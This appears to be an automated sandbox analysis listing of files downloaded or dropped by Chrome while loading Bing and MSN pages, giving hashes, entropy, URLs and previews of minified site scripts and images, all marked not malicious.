                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (938), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):938
                                                                                                                                                                                                                                                                        Entropy (8bit):5.18200878052665
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:GFUFqJYYmaLOTCE20aOtZP9F3a6MakIzHF+lvyUJ9sq5aOB:BWOWEZP9U6MUEvyUJ9s6
                                                                                                                                                                                                                                                                        MD5:DBF771B1F0B05393D18BC55FD6DD94A7
                                                                                                                                                                                                                                                                        SHA1:BC4FD6C9EFB2E87D2D30F19DD78C9188B6D76B2D
                                                                                                                                                                                                                                                                        SHA-256:F2C5677D58718AE60F7F4E98351643AFEB8AD7FDFE4B2B6AF0B7B63108CB7071
                                                                                                                                                                                                                                                                        SHA-512:50B113243923EC8E4432288AE4FDE5B2FD0339C0EE785D33543E2C502F366E33BA99B0B1C0893E78CA23B820B71A9E3E4CBA31F5D865C43A989E3262D869ADCE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/vE_Wye-y6H0tMPGd14yRiLbXay0.js
                                                                                                                                                                                                                                                                        Preview:var ShareDialog;(function(n){function i(){t("bootstrap",arguments)}function r(){t("show",arguments)}function u(){t("showError",arguments)}function t(n,t){for(var r=["shdlgapi",n],i=0;i<t.length;i++)r.push(t[i]);sj_evt.fire.apply(null,r)}n.bootstrap=i;n.show=r;n.showError=u})(ShareDialog||(ShareDialog={})),function(n){function i(){t==0&&u()}function r(){sj_evt.unbind("shdlgapi",i)}function u(){t=1;var n=ShareDialogConfig.shareDialogUrl+"&IG="+_G.IG;n=e(n,["uncrunched","testhooks"]);sj_ajax(n,{callback:function(n,i){n?(t=2,i.appendTo(_d.body),r(),f()):t=3},timeout:0})}function f(){var n="rms";_w[n]&_w[n].start()}function e(n,t){var i,r,u;for(r in t)u=new RegExp("[?&]".concat(t[r],"=[^?&#]*"),"i"),(i=location.href.match(u))&&i[0]&&(n+="&"+i[0].substring(1));return n}function o(){n.inited=0}function s(){n.inited||(n.inited=1,sj_evt.bind("shdlgapi",i,!0),sj_evt.bind("ajax.unload",o,!1))}var t=0;s()}(ShareDialog||(ShareDialog={}))
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (15366), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):15366
                                                                                                                                                                                                                                                                        Entropy (8bit):5.333473665998834
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:AH1NY1hmdGmYSm9RhHah/hmsl3MAzk5T0hX9Vo4Lh0i/wWVmI9FwR1+mSdVKF+/Z:21NY1hSGmYSm3hHah/hLl3MAziT0hNVd
                                                                                                                                                                                                                                                                        MD5:6AA549AE9767E420C1AF7D429EBB0888
                                                                                                                                                                                                                                                                        SHA1:53E3793A4FDE7962C293A05B09F56A5E2AF38E3B
                                                                                                                                                                                                                                                                        SHA-256:2AC506835420843EA7B32FCEE470F532F164A670B0A9C172425C2B247D19F025
                                                                                                                                                                                                                                                                        SHA-512:DF100E42361A9AFDDA93E2D63B1C73BA5472B68E2EA5175EDC4F6E1596BEC711B2531978D43232F0047A1C26DFAFA4FE40F9875E7351812CB9FF8CF65DA53B7A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://assets.msn.com/bundles/v1/bingHomepage/latest/weather-data-lazy-services.f949e23f4e92b28e221c.js
                                                                                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_msnews_msnews_experiences=self.webpackChunk_msnews_msnews_experiences||[]).push([["weather-data-lazy-services"],{83769:function(e,t,i){i.r(t),i.d(t,{createVersionApiClient:function(){return s}});var n=i(33940),r=i(56692);function o(e,t,i){return(0,n.mG)(this,void 0,void 0,(function*(){const o=t.path||"",a="/"==o[0]?o.substring(1):o,l=t.urlBase,s="/"==l[l.length-1]?l:l+"/",c=new URL(a,s),d=c.searchParams;i&&d.set("activityid",(0,r.Yq)().ActivityId);for(const[e,i]of Object.entries(t.queries||{}))d.set(e,i);return yield function(e,t){return(0,n.mG)(this,void 0,void 0,(function*(){let i="";try{const n=yield e(t);if(i=n.status,n.ok)return yield n.json()}catch(e){i=`status=${i},error=`+(e&&e.toString())}throw new Error(""+i)}))}(e,c.href)}))}var a=i(22089),l=i(22704);function s(e,t){if(t&&t.tileVersionApi){const i=Object.assign(Object.assign({},t.tileVersionApi),{urlBase:t.weatherApi.endpoint});return{fetchTileVersions:()=>{const n=(0,l.UE)();o(e,i,!0).then(((
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3102), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):3102
                                                                                                                                                                                                                                                                        Entropy (8bit):5.21762849278984
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:wSGAYinlz3omPxexUQn4T4mEWOJXBEmQ4Qbjzu7EG62C5lamlh/uf:w3inJ3rs6DTmfXBq4Ujzu7k9jfK
                                                                                                                                                                                                                                                                        MD5:DD6A528C55708896155FEA98148725FA
                                                                                                                                                                                                                                                                        SHA1:53C48069ABE54FD30D9FFF1D7FD8C287AFBBE1B1
                                                                                                                                                                                                                                                                        SHA-256:635421AF44598C7601907A7AD263A3A8925BE6495BA349382F02805DBE668566
                                                                                                                                                                                                                                                                        SHA-512:B1D3214F238D873708ABDD7DADB4E3C01BFA036B0AA737028E58E9EC5236A6D8600DC0D11628B0E299027ADD8697D60D37443548864D1DB3B25747098BFB1A24
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/U8SAaavlT9MNn_8df9jCh6-74bE.js
                                                                                                                                                                                                                                                                        Preview:var MobileIcon;(function(){function wt(){var t,i;tt()?((t=n===null||n===void 0?void 0:n.classList)===null||t===void 0?void 0:t.add("b_hide"),r("overlap")):((i=n===null||n===void 0?void 0:n.classList)===null||i===void 0?void 0:i.remove("b_hide"),Log.Log(b,k,"resize"))}function tt(){return(g===null||g===void 0?void 0:g.offsetWidth)-((e===null||e===void 0?void 0:e.offsetWidth)+(d===null||d===void 0?void 0:d.offsetWidth)+at)<vt}function i(t){var i=_ge("id_mobpopcntr");(n===null||n===void 0?void 0:n.contains(t===null||t===void 0?void 0:t.target))||(i===null||i===void 0?void 0:i.contains(t===null||t===void 0?void 0:t.target))||r("ClickPage")}function ht(t){Log.Log(it,k,t);bt();n===null||n===void 0?void 0:n.classList.add("active");s=!0}function ct(){if(sj_gx){var n=sj_gx();n.onreadystatechange=function(){n.readyState==4&&n.status==200&&(et=!0,sj_appHTML(e,n.responseText),sb_st(function(){ht("ClickMobileIcon")},250))};n.open("GET","/header/mobupsellfly",!0);n.send()}}function bt(){sj_be(_d,"cl
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):121985
                                                                                                                                                                                                                                                                        Entropy (8bit):5.341090761312292
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:52+c51J9cXDBFAtutXwkIQYjSoiDxzAaImL1142qxkO0ni2agfBiXykUONNDdEVX:5nKhmrvAaAkd+g6UOpih
                                                                                                                                                                                                                                                                        MD5:844D73E18AD668FA1E9057452080D941
                                                                                                                                                                                                                                                                        SHA1:213E6C9C9979DB3C5E00393B592DAC1CF8D77B8F
                                                                                                                                                                                                                                                                        SHA-256:6FB0ED92A382C45DE7F7DF08F989D08573E06BEC4239F6A3A0841141E990DB1D
                                                                                                                                                                                                                                                                        SHA-512:EBB3468BC6ABE33C528B44D4AA2FB012B35072E4CA7E1D04CB0BDDE02A8B5BF066F27D6935E1DC18D0D7FB74A633DAD01A82FA94EB9B4E2EC72537AEEFB60490
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/IT5snJl52zxeADk7WS2sHPjXe48.js
                                                                                                                                                                                                                                                                        Preview:var AutoSuggest,__extends,EventKeyCodes,Bing,sa_inst;(function(n){var t;(function(n){var t,i,r,u,f,e;(function(n){n.User="SRCHHPGUSR"})(t=n.CookieNames||(n.CookieNames={})),function(n){n.AutoSuggest="AS"}(i=n.CrumbNames||(n.CrumbNames={})),function(n){n.CursorPosition="cp";n.ConversationId="cvid";n.SuggestionCount="sc";n.PartialQuery="pq";n.SuggestionPosition="sp";n.SuggestionType="qs";n.PreviewPaneSuggestionType="qsc";n.SkipValue="sk";n.PreviewPaneSkipValue="skc";n.Ghosting="ghc";n.Css="css";n.Count="count";n.DataSet="ds";n.SessionId="sid";n.TimeStamp="qt";n.Query="q";n.ImpressionGuid="ig";n.QFQuery="qry";n.BaseQuery="bq";n.FormCode="form";n.HashedMuid="nclid";n.RequestElToken="elvr";n.ElTokenValue="elv";n.AppId="appid";n.History="history";n.NoHistory="nohs";n.ApiTextDecoration="textdecorations";n.ClientId="clientid";n.Market="mkt";n.Scope="scope";n.CountryCode="cc";n.HomeGeographicRegion="hgr";n.SetLang="setlang";n.ZeroInputSerp="zis";n.GhShown="ghsh";n.GhAccepted="ghacc";n.GhPrefixL
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1286
                                                                                                                                                                                                                                                                        Entropy (8bit):4.773989693534619
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:6v/7ca/f35DANXCShEDELHjiQEsq1zjUPEYCjJfhqEA/EL+qhE5y5Pc1Z:XaX38kDyiQEsq1zXtthG/aE5yd
                                                                                                                                                                                                                                                                        MD5:0CD18720313EC21B2B899D2F4A8A9602
                                                                                                                                                                                                                                                                        SHA1:685F722E55CE3AEBABA71DE8BC4467BC9D5EA3A1
                                                                                                                                                                                                                                                                        SHA-256:CA2E862C45CC7243EEB1DB4985E24E6F832E931849F969BC32A68301AACFAE8F
                                                                                                                                                                                                                                                                        SHA-512:DCEE1F1EAC013892EAAD239903A57B395487607FD249D572DFAC25006202CDF0D50B407317B9266BBE53EA038AAE1993E18B987FDE18DD7692571F6BECDA6B85
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................a....pHYs..........+.....EIDATx....K.Q....mt.f..8.x.6I`+.......-.@".BA.Ve..V-.Z.....". ...h.E.L.,+Mgr.....j;}p8..}......E..@X..o..*V..........A....|F....^)....kmr.1.....IAE.MvY....@..V.v..qp..8..S3.o..xz.......Tnl'.....e..........?@]o?.W.I......@s..7G.u.b..}B....D.......N..{..;........k..%U.."4..AU.../.a..]..;h.z...P......-....F....i,...V..^]%.WSrR.I.....C>..%....(...R3/qD.I.........[..[..>nu._....Di.?....{.......uA...uk!9.....\..x.xJ........}.I..c~....i._.?J....W.........GT.C....6...=[..c.&.{.?.l"/.K...@..R.S... K.8J0^.%4.D..y@k.<NH.2^.H..41.0..|..~1bj.......r.a*<&.........'>..$....IEND.B`......................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 134 x 64, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):7441
                                                                                                                                                                                                                                                                        Entropy (8bit):7.961547902598206
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:u5AWFqvmUXx8GYnT/6M+wxWHWfkM6W+iBvH:e7M3BenT/6M+wxEWfk6B/
                                                                                                                                                                                                                                                                        MD5:C162A5D5C4B750769BF48752F6206FDA
                                                                                                                                                                                                                                                                        SHA1:52554BFC629CAAB91D215026785314781B9A0708
                                                                                                                                                                                                                                                                        SHA-256:89835F7C743F40ABECCB11C85E34FF17120CF0AF614327E527E5B37B01848FCF
                                                                                                                                                                                                                                                                        SHA-512:30EBB95F24A38ABFEAC7EFF24F6E61563355B40773DA85F059709A5D3F1F79C8AE7B52877F4B4CB64EB177C295DBA62DFBA2CA866C40398E9F6C57D285D65D10
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR.......@.............PLTE.........................{|.......9_.(BW{|...."Jgyzz....._.....]w...N?...u..c .d]..I;.J......f....m5.d~|Jo..u..r...?......d~..j.j..fu.J...p..e{J.."x.SVOfWD.r..A....m9......!.H?.c..re.j...<.f-...!.s;..Z[Y..V%.fX.M.....p~<\..B.tG2.n4.cxy4....e..w.m[..W...y.9...,b...A\.j<.......v..;..C.t:.d%ndg....;.......5.\......>.sJ.b.._Z.z..$..!}.(#...d.#/. )....z...jk...... .yu9 .;8.$.....y..te....df.(,...5.Li..p.....Na]..........~Z.5F4.|...G.}}}|..@p1....2..p.s..L..WbJ........S@(...KqZ......rK.h.&.....-n.2..........r........rtp...x..0`....&,-.&.|...&..H..x.......887..s.d...5.z.......s.W..GHE...G/8.x...m....o+..!.{...S.......<...x.%.J...-CZ.:....R#.:..Z...k..dN$..g.....CN .}E.I..B.Q_B.c...x0.)A..zs....IDATh.]..\......._....../....c...,H.Z......'....X.v..$+...b..t.....nZ..*..=....V....6.Mr*.6n.....&....{.g......x.....~.../../........|.r}.@}6.p......td.gL ...w.f.x.v....>..
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x225, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):12412
                                                                                                                                                                                                                                                                        Entropy (8bit):7.955100286795984
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:esULsp0eWjZxP9+uUfCHINPnFvsjdW1N05n:e4pzyZj+FKHuZi414
                                                                                                                                                                                                                                                                        MD5:83424BBDE15001754CD2615CCD2E4021
                                                                                                                                                                                                                                                                        SHA1:F23C38D3B1E5FE98DDA52664FB613668E087847B
                                                                                                                                                                                                                                                                        SHA-256:ED065140F836882523191F5C70D2C0EE09EADE9DF6A30032AAC698D5AC142D4E
                                                                                                                                                                                                                                                                        SHA-512:65BD10E07945D704AE8879E7F4935B01229F732E71661729C4101813E86217B391BB095CEF7A6703AC6518776E288C834A9501996BD63D42A47D7B47C763F1E2
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......6..;..u..\.&.0.K.....V.W,F..S..........N.P.<S.?.D.;4.;sz.c..4.<.....sN...<.@...n.ZNipM+.77....V.0h....i7..?ZE../'.h.G...x..+....5!z.YG...j..#...*..2....2.j7.kkZz........G....W..~..E.A...........O......R.*....k..&|F.....F?.....vu{H....4.*.c.,N...k...?.s.../..m2...s.t#.UN.zpM|....k...+..<.u/.$bb....Q.8.]..3....<DW...'..bF.|o........{q.]6...Wliz......
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2009), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2009
                                                                                                                                                                                                                                                                        Entropy (8bit):5.260635854713912
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:y2x50QNQE0YpOP8AA+nLzpJWM1nzfC57eADCoAILODcv/KUSCUvXG3AP5tD1FiOw:7LpsA0pJdQ7eG2KRSCMg+D1gZV5
                                                                                                                                                                                                                                                                        MD5:601102CA711E0B4140AF45C1657DB13F
                                                                                                                                                                                                                                                                        SHA1:7977EF6E79471380B8787B5B7148E9FF0A74A203
                                                                                                                                                                                                                                                                        SHA-256:E47318CD9D80769AC59E732347FB4F574CD4EEA9E2C787F3A996805265069001
                                                                                                                                                                                                                                                                        SHA-512:082834DC3EC02CF433FBD8D45C7CFDAC1EDF64B90E1198E48EACA4056E98BBE1BCFA8275B4D99BCC0E6934049DC084EEC5D640B54C1933DABB42FA75016E3E40
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:var RewardsCreditRefresh;(function(n){function r(t,i,r,u,f,e,o,s,h,c,l,a,v,y){sj_cook.set(t,i,r.toString(),!1,"/");sj_cook.set(t,u,f.toString(),!1,"/");sj_cook.set(t,e,o.toString(),!1,"/");sj_cook.set(t,s,h.toString(),!1,"/");sj_cook.set(t,c,l.toString(),!1,"/");sj_cook.set(t,a,v.toString(),!1,"/");sj_evt.fire("RewardsCookieUpdated");sj_evt.bind("identityHeaderShown",function(){return n.RewardsHeaderAnim(o,r,f,y)},1)}function u(n,r,u,f){var h;u=u||r;var s=_ge("id_rh"),e=_ge("rh_animcrcl"),a=_ge("id_rc");if(s&&a&&(e||_ge("givemuid_heart"))&&!(r<0)&&!(r<n)&&!(u<=0)){var o=_ge("rewardsEntryPoint"),v=800,y=r-n,c=Math.min(100,100*(r/u)),l=e&&c>=100&&n<u,p=y>0,w=Date.now();c>=100&&s.classList&&Lib.CssClass.add(s,"rh_reedm");e&&Lib.CssClass.add(e,"anim");h=function(u){var a,k;if(u){var tt=Date.now(),d=tt-w,g=Math.min(d/v,1),it=l?t*g:t*c/100,rt=p?Math.min(Math.floor((n+g*y)/f)*f,r):r,nt=_ge("rewardsBright"),b=_ge("rewardsAnimation");e&&e.setAttribute("stroke-dasharray",it.toString()+","+t.toSt
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 268x224, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):5901
                                                                                                                                                                                                                                                                        Entropy (8bit):7.902009675697229
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:NPbbbrHlYM80XPq3s+cbODSZRyOvMUi0oV2OmhaRgPSgjAQlAe6jEFd9ThYO2lXL:NPbbbBC0XPq32RvyOvYwhpVjAQRbDHYZ
                                                                                                                                                                                                                                                                        MD5:724ED6D9C7E08D475DE2A4D13BF765C3
                                                                                                                                                                                                                                                                        SHA1:34463B15C954D0B452864090C39869514B6F09A8
                                                                                                                                                                                                                                                                        SHA-256:D15868649ED820AB797A3F0E85BAEAE6ED3174D3A3DC8FAAC9B57A8A5474E513
                                                                                                                                                                                                                                                                        SHA-512:C92E491DD2B4577D2A2859F6831243C66200172395E1089AF039D3E96345DE65ADC44C90386221ADEC9C0F82F77782CD1C0936E34B05D5C5AD96130F9DFA977D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.............C.......................................%..%....)).%756.*2>-)0.;!....C...........,...,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,...........".......................................R..........................!1Qq.2Aa..."....Rbr...#%BS...$345ce.......t&6ETUdsu........................................................1.!A.BQ............?....'i.{J....(z..T*.....w..T".....w..T".....w..T".....w..T"..}..tf.u,r.=I6.fw.Va..iW=..S..j.....r..Z85.#w.k."......|qW:..gC<sA3....to......5...z..T.5...)......^..'h....h5.l..z.'.......)...=.?......j.4UM.c....Q.6....v..~.`;.......u....S.0.7.^.K.K....n.}...k..Y.wl...\'.....m.+.rF0.F6g;.N.F...2UB.... ..h....=....,cs/...5...n.Zp2.f.} ...'.R.p.:c.U...A.MG...`.gnv{.?.l.....E=;%s.qa.9Xc.o,.....r..c..0c....'>.F.....g...]..=.]WN.g.Y...V.a._.k.m....D..'.L;.f....=c..l..u..8.[..7[.]........W.9w..S..|J.A9w..S..|J.A9w..S..|J.A9w..S..|J.A9w..U.'.<UJ.n<.....w2.I.;.P................y..Y(&......C.:.r2.......i.........y.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:08:01 11:40:12], progressive, precision 8, 160x160, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):6817
                                                                                                                                                                                                                                                                        Entropy (8bit):7.859219052464007
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:sO4w46jQPjxS2VUxVMkjqHqHfGaOUE37ri:sO346jojxR0WKHfoe
                                                                                                                                                                                                                                                                        MD5:0C41EE31B04E978B4882D17690F03A3A
                                                                                                                                                                                                                                                                        SHA1:1890E62ABDFF4D2DD0A66E8A10BF5429440A50EE
                                                                                                                                                                                                                                                                        SHA-256:97785743A5FFC303FF8B7B465CD12AF8403F7EED2B2D19687E118E2621059741
                                                                                                                                                                                                                                                                        SHA-512:88555E4C500A6B416E8A8E783497B1F6925EEAF708991080E3776757102D9D522CA4830CE924ACA23EC55C579AAC5CFCA7116343236FE8BF8A13FB2DFBD104AD
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/GJDmKr3_TS3Qpm6KEL9UKUQKUO4.jpg
                                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:08:01 11:40:12....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;...........................................................................................!e."E.T....!......S-C`!..bB.e.J2.z..:<....9.=.[....... .l..Rwy...X..s..u....!.a gNe..+......r...!..-8ZX%..!.e..e../.]..e.vk.R0._;.|..<hE...l..i..,.s.Ec.e.G..T....|.s..K..............+.|.q.=..1*r..$vSb..^q.(hk/..w8...;.v..p:.....C.k.....q.(.M..M.....}q.r+...N.....#.xK.O.....Ci.S=s...}ea[..>MC4.zN;w.Z.%...g.....jo:.g..L.7.......K3...oa.}.=3.<No.|*l..q...#Iszt.z..g..%...z..m.....q....t.L%.\Xc..r:.a...........*s{.A..=.z%.W....y}}..W..2......*^..s..^...R.$..K..E'M........c.[..Buhvu....H...7N.=...o|...Z[\.:.=..3.......jP...k....p.....r. ...!R.z2....*`T.......H.*k,..`.@..$P@G...(....
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (425), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):425
                                                                                                                                                                                                                                                                        Entropy (8bit):4.963129739598361
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:2gXsmzwKN0yApFkRLNF1Jfa1VTWPMg9pIGywV:2gX9zwKN0yAqr1Jfa1V059V
                                                                                                                                                                                                                                                                        MD5:016ECFDB34031F881FA5E34DFBD0B7A1
                                                                                                                                                                                                                                                                        SHA1:16D3BA1049939D00AE47AAD053993B4762D9B102
                                                                                                                                                                                                                                                                        SHA-256:08021ED3BCA5532304B597E636BEB939FF7BAA6D08DCA4E94C0DDE1FDF940389
                                                                                                                                                                                                                                                                        SHA-512:D61045D1F07ED241626B8233D388F5E1AD54DBE224871E1CE872ECFD0E29F05A21F0EA02FFDE688FACB134DD969533615493BD35EBA4D5E755840C30A687EE00
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/FtO6EEmTnQCuR6rQU5k7R2LZsQI.js
                                                                                                                                                                                                                                                                        Preview:(function(n){function f(){u(sj_be,r)}function r(i){return i&&n.enqueue(t,i),!0}function e(){u(sj_ue,r)}function u(n,t){for(var u,r=0;r<i.length;r++)u=i[r],n(u==="resize"?window:document,window.navigator.pointerEnabled?u.replace("mouse","pointer"):u,t,!1)}var t="EVT",i=["click","mousedown","mouseup","touchstart","touchend","mousemove","touchmove","scroll","keydown","resize"];n.wireup(t,{load:f,compute:null,unload:e})})(BM)
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (423), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):423
                                                                                                                                                                                                                                                                        Entropy (8bit):5.117319003552808
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:2gSYjthM4GF4aaXtdhI9DfaUZnsMQYAQI:2gSW/bS9/ZnsMAj
                                                                                                                                                                                                                                                                        MD5:3A5049DB26AF9CE03DB6A53D3541082D
                                                                                                                                                                                                                                                                        SHA1:934DAEA4EDDE2568CA02AB89AF23FDCFEB57339A
                                                                                                                                                                                                                                                                        SHA-256:AF8C36DEFED55D79106513865F69933E546E1E4C361E41C29F65905DED009047
                                                                                                                                                                                                                                                                        SHA-512:5E21B6E184CBB0013DCCE174345DAC14BB64D391CCA3B253F73C7373253FDCA5E0BB297A0BD2FAD237E4F796895807660369680621C49C8F99DF428ED3218C9E
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/k02upO3eJWjKAquJryP9z-tXM5o.js
                                                                                                                                                                                                                                                                        Preview:(function(n){function i(){var e,o,u,s,f,r;if(document.querySelector&&document.querySelectorAll){e=[];o=n.rules;for(u in o)for(s=o[u],u+=!s[2]?"":" >*",f=document.querySelectorAll(u),r=0;r<f.length;r++){var i=f[r],h=0,c=0,l=i.offsetWidth,a=i.offsetHeight;do h+=i.offsetLeft,c+=i.offsetTop;while(i=i.offsetParent);e.push({_e:f[r],x:h,y:c,w:l,h:a})}n.enqueue(t,e)}}var t="L";n.wireup(t,{load:null,compute:i,unload:null})})(BM)
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):240720
                                                                                                                                                                                                                                                                        Entropy (8bit):6.032550786225865
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:9FNk7kSN9BJqxaO7aeAAvedrJycHLF5/b:9z+kSNLJiF2Fy25/b
                                                                                                                                                                                                                                                                        MD5:BF09E9F635E19B5CC486316A6DA175EF
                                                                                                                                                                                                                                                                        SHA1:77F0E686883040E5A36C45FE834A0BA5055C039C
                                                                                                                                                                                                                                                                        SHA-256:F021297E15BA80FB4993DA092F755C362B38F83035C3FF4188AB9577016D209C
                                                                                                                                                                                                                                                                        SHA-512:448FFB76DBAE9DCFDBB3F323D1CC7697B5F1D60F9CDDC25CAADA042A80A100626CDE3C752C364E2EF09CFB8562C28F6C1B29AF45F448F149CD4FF00F7CE1B76D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/d_DmhogwQOWjbEX-g0oLpQVcA5w.css
